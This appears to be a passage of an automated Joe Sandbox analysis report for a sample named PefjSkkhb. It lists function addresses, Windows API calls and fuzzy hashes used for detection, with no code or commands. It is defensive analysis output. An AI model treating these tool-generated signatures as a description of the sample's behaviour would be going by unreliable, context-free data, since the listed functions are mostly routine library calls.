                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: IconNotifyShell_
                                                                                • String ID:
                                                                                • API String ID: 1144537725-0
                                                                                • Opcode ID: 32275c29c25acc732941c8e4684a790687827c850461c861846bda9725fb2c55
                                                                                • Instruction ID: abc2735be3eae081b06d025d31a00c517b94e65274bd0d0d6ecb96583f350682
                                                                                • Opcode Fuzzy Hash: 32275c29c25acc732941c8e4684a790687827c850461c861846bda9725fb2c55
                                                                                • Instruction Fuzzy Hash: 0D419F72908BC586E7B1AF21E4407E8B3A4FB48B98F840035DA4D47359DF7CD1A0C720
                                                                                Function 00007FF79F8B3E9C Relevance: 3.0, APIs: 2, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF79F8AA2E2), ref: 00007FF79F8B3EB0
                                                                                • FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF79F8AA2E2), ref: 00007FF79F8B3F15
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentStrings$Free
                                                                                • String ID:
                                                                                • API String ID: 3328510275-0
                                                                                • Opcode ID: 7a2552942933b56ccb1f3da2e42ebda5c79027b354ecde1dfe545767dcb9d8c9
                                                                                • Instruction ID: 5445a44f3a8c4968dd92ee452d166838b6bb5f61bf995c0fad1d218a70d442a9
                                                                                • Opcode Fuzzy Hash: 7a2552942933b56ccb1f3da2e42ebda5c79027b354ecde1dfe545767dcb9d8c9
                                                                                • Instruction Fuzzy Hash: 7B018421B09B8181DE71BF3564054EEA660EF44FE1BD81236EE5E07BD5DE3CE4619250
                                                                                Function 00007FF79F873730 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsThemeActive.UXTHEME ref: 00007FF79F873756
                                                                                  • Part of subcall function 00007FF79F899334: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F899348
                                                                                  • Part of subcall function 00007FF79F8736E8: SystemParametersInfoW.USER32 ref: 00007FF79F873705
                                                                                  • Part of subcall function 00007FF79F8736E8: SystemParametersInfoW.USER32 ref: 00007FF79F873725
                                                                                  • Part of subcall function 00007FF79F8737B0: GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF79F873785), ref: 00007FF79F8737F2
                                                                                  • Part of subcall function 00007FF79F8737B0: IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF79F873785), ref: 00007FF79F873807
                                                                                  • Part of subcall function 00007FF79F8737B0: GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF79F873785), ref: 00007FF79F87388D
                                                                                  • Part of subcall function 00007FF79F8737B0: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF79F873785), ref: 00007FF79F873924
                                                                                • SystemParametersInfoW.USER32 ref: 00007FF79F873797
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme_invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 4207566314-0
                                                                                • Opcode ID: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                                                • Instruction ID: 140fe8c95da1b52160dbc5151f885276bb85e2f445892a76234d6fc6ceae7baa
                                                                                • Opcode Fuzzy Hash: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                                                • Instruction Fuzzy Hash: 38014670E0C6C29AF7B0BB71A885AF5E361AF48751FC40035D40D863AADE6DB4A4A721
                                                                                Function 00007FF79F8AB3C0 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 485612231-0
                                                                                • Opcode ID: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                                                • Instruction ID: d3c4169e690749b1d983b7690ee080dfadc13d8fa066e998fc029246bc0a6467
                                                                                • Opcode Fuzzy Hash: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                                                • Instruction Fuzzy Hash: 1EE08651E1A5C382FF74BBB25C045F4A3D1EF44760FC44030C80D8F256DE2CE4954620
                                                                                Function 00007FF79F8B04B8 Relevance: 2.6, APIs: 2, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: CloseErrorHandleLast
                                                                                • String ID:
                                                                                • API String ID: 918212764-0
                                                                                • Opcode ID: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                                                • Instruction ID: b204cc6ebfe2cd39a50d8c17feee3b34b9ce3323384c757ac680aeb861c968eb
                                                                                • Opcode Fuzzy Hash: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                                                • Instruction Fuzzy Hash: 71112610F1C2C241FEF4B772A8946FC92C29F84779F880634DA2E467D2CD6CE864A221
                                                                                Function 00007FF79F881475 Relevance: 2.0, APIs: 1, Instructions: 533COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Init_thread_footer
                                                                                • String ID:
                                                                                • API String ID: 1385522511-0
                                                                                • Opcode ID: 14d8bcb0f5e5d36dc6dc2465f5c4b4e36f70afd0639fb95ae083af4e2f9187f7
                                                                                • Instruction ID: 12ed272f419f1a9d8560ea42f4dd3cbcd1370fe2c0834b49832326640274b77c
                                                                                • Opcode Fuzzy Hash: 14d8bcb0f5e5d36dc6dc2465f5c4b4e36f70afd0639fb95ae083af4e2f9187f7
                                                                                • Instruction Fuzzy Hash: 5B32D222A08BC285EBB4EF25C444AF9E761FB85B84F848131DA5E47795CF3DE461E720
                                                                                Function 00007FF79F8D20D6 Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ClearVariant
                                                                                • String ID:
                                                                                • API String ID: 1473721057-0
                                                                                • Opcode ID: d5cf1192761794fe4b954deb7468c2d4d1c2f7b36110f07c0798e677f51d25b9
                                                                                • Instruction ID: 8836b2ab91fd2ebafd96a57746ce2f3fb6f51dc9431816dbad29d21a6867b16c
                                                                                • Opcode Fuzzy Hash: d5cf1192761794fe4b954deb7468c2d4d1c2f7b36110f07c0798e677f51d25b9
                                                                                • Instruction Fuzzy Hash: C0415F22B0868196EB61AF71D0407ECA3A0FB44B98F948535CE1D57799CF7CE4A5D360
                                                                                Function 00007FF79F898FAC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                                                • String ID:
                                                                                • API String ID: 3947729631-0
                                                                                • Opcode ID: 867c7b1033e3f760706abf2d2d8e8ea2ff197c00114f18769501bed1359dd07f
                                                                                • Instruction ID: 9be3afb1f893624856188511be70cd82f8b4f84dd6f4c0d92c7a808228862a8a
                                                                                • Opcode Fuzzy Hash: 867c7b1033e3f760706abf2d2d8e8ea2ff197c00114f18769501bed1359dd07f
                                                                                • Instruction Fuzzy Hash: 4541D021A186D282EEB4BB34D8805F4A350EF80764F844435DA1D87795DF3EF8909320
                                                                                Function 00007FF79F8B6D04 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 3215553584-0
                                                                                • Opcode ID: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
                                                                                • Instruction ID: d0863c13b5fcaf3a215ea60df7dd4bc2f3be922b0a439200b8d929a80c9a5dc8
                                                                                • Opcode Fuzzy Hash: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
                                                                                • Instruction Fuzzy Hash: 6C21F4727186C287EBB5AF34E4407B9B6A0EB80B99F584234DA5D8B6D5DF2DC810DB10
                                                                                Function 00007FF79F8A48E0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 3215553584-0
                                                                                • Opcode ID: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
                                                                                • Instruction ID: 67c22a3271d67911ae026d7ca75d9ead275b6f0563995585c2899d85969361b4
                                                                                • Opcode Fuzzy Hash: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
                                                                                • Instruction Fuzzy Hash: D121CB22B1D6C681EEB1BF71A4009BDD260FF44B84FA44030EA4C57B96DF7CE861A760
                                                                                Function 00007FF79F8F5B80 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 69bddbc63fd99da0361e32bf605d9336e4230c0dde7f0018513f1afea8dd74fd
                                                                                • Instruction ID: 0cf098c840a3ba547f7b9982aaf72b9e4e7540980e85fe0e285ef522300bb96a
                                                                                • Opcode Fuzzy Hash: 69bddbc63fd99da0361e32bf605d9336e4230c0dde7f0018513f1afea8dd74fd
                                                                                • Instruction Fuzzy Hash: 7D118226719A8586EBA4AF25D0817BCA360FB94FE0F945132DE1E0B3A1CF3CD4A0D350
                                                                                Function 00007FF79F8B0414 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
                                                                                • Instruction ID: 8610e02ea762dfdc4b1d71cca034430294733622e03458a93b3811ef954caeeb
                                                                                • Opcode Fuzzy Hash: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
                                                                                • Instruction Fuzzy Hash: 9C11E37291C6C686EAA5BF60D4006ECF761EF80365FD04132E64D0A2D6DFBCD050DB20
                                                                                Function 00007FF79F8A48EC Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 3215553584-0
                                                                                • Opcode ID: 818d4f054f78961d0311f8415a74e8c04cfe353b78e3df62868af38b1621707f
                                                                                • Instruction ID: 6058b6d96c89707bd1a83512c660a23fdbbfcff5796e43f033308971ed478853
                                                                                • Opcode Fuzzy Hash: 818d4f054f78961d0311f8415a74e8c04cfe353b78e3df62868af38b1621707f
                                                                                • Instruction Fuzzy Hash: 9E01D421E0A28740FEB4BB759415BF99150DF85764FB81230E92D472E2CD6CE8316221
                                                                                Function 00007FF79F8A4970 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 3215553584-0
                                                                                • Opcode ID: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
                                                                                • Instruction ID: bb4b33faa8f1f196ba411f6117fd7555eeb599d1a3e9f3d22416d8b7bbe2dbcb
                                                                                • Opcode Fuzzy Hash: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
                                                                                • Instruction Fuzzy Hash: 59F09622A0D18745EDF5767564019F9A284DF40754FB81130F95D462E6DE2CE471A621
                                                                                Function 00007FF79F87652C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00007FF79F8A4970: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F8A4999
                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF79F8BC8FE), ref: 00007FF79F87656F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary_invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 3938577545-0
                                                                                • Opcode ID: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
                                                                                • Instruction ID: 55affba4d8be69c29ffbc51a45cc3d8e9061e5314fdf6aa1c17c75af49ef286b
                                                                                • Opcode Fuzzy Hash: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
                                                                                • Instruction Fuzzy Hash: 5DF05E92A09A8582FF69EF75C8557786360FF58F0CF580530CA0E8A289CF2CD4A4E361
                                                                                Function 00007FF79F894C68 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF79F894C5C
                                                                                  • Part of subcall function 00007FF79F895600: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF79F895609
                                                                                  • Part of subcall function 00007FF79F895600: _CxxThrowException.LIBVCRUNTIME ref: 00007FF79F89561A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Concurrency::cancel_current_taskExceptionThrowstd::bad_alloc::bad_alloc
                                                                                • String ID:
                                                                                • API String ID: 1680350287-0
                                                                                • Opcode ID: fcccb4986ec6b07b19f565cd1119bb6721087df1cc262ad93f02db05b15ececb
                                                                                • Instruction ID: 8c01a3ac4bb2c82e124b6e40d1a970856ca65879700d30f0b09a6fdf510faee6
                                                                                • Opcode Fuzzy Hash: fcccb4986ec6b07b19f565cd1119bb6721087df1cc262ad93f02db05b15ececb
                                                                                • Instruction Fuzzy Hash: 53E09240E1A18749FAF975B215558F882800F58379FE89B31E93E492C2AD2CB4F16130
                                                                                Function 00007FF79F8EB334 Relevance: 1.5, APIs: 1, Instructions: 21fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0
                                                                                • Opcode ID: a0a1439e265e291f150910246ad1a366446c83d0ba354e2dc0beef75c9ab4ebe
                                                                                • Instruction ID: ac8e13c6c33b2065e545a46a6ba2ef8eb3cd872a2404405fba37e2578646541a
                                                                                • Opcode Fuzzy Hash: a0a1439e265e291f150910246ad1a366446c83d0ba354e2dc0beef75c9ab4ebe
                                                                                • Instruction Fuzzy Hash: 0CE03922618A9182D720DB16F48035AE370FB89BD8F944525EF8C4BB19CF7DC5618B80
